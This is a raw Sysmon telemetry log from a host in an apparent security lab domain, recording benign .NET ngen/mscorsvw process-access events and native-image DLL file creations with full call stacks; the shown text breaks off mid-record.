13:25:21.148{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4641-6000-9E03-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4641-6000-9D03-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.023{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4641-6000-9D03-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.023{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4641-6000-9D03-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:24.930{08A6967A-4644-6000-A203-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1040-0\Microsoft.Build.Conversion.v4.0.dll2021-01-14 13:25:24.930 10341000x80000000000000007854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.820{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4644-6000-A203-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.805{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4644-6000-A203-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.805{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4644-6000-A203-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.727{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4644-6000-A103-000000009A01}3056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.711{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4644-6000-A103-000000009A01}3056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.711{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4644-6000-A103-000000009A01}3056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:24.539{08A6967A-4641-6000-A003-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1318-0\Microsoft.Build.dll2021-01-14 13:25:24.539 11241100x80000000000000007862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:25.977{08A6967A-4645-6000-A403-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\103c-0\Microsoft.Build.Engine.dll2021-01-14 13:25:25.977 10341000x80000000000000007861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:25.086{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4645-6000-A403-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:25.070{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4645-6000-A403-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:25.070{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4645-6000-A403-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:25.008{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4645-6000-A303-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.992{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4645-6000-A303-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:24.992{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4645-6000-A303-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.696{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4646-6000-A803-000000009A01}4208C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.680{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4646-6000-A803-000000009A01}4208C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.680{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4646-6000-A803-000000009A01}4208C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.492{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4646-6000-A703-000000009A01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.477{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4646-6000-A703-000000009A01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:26.477{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4646-6000-A703-000000009A01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 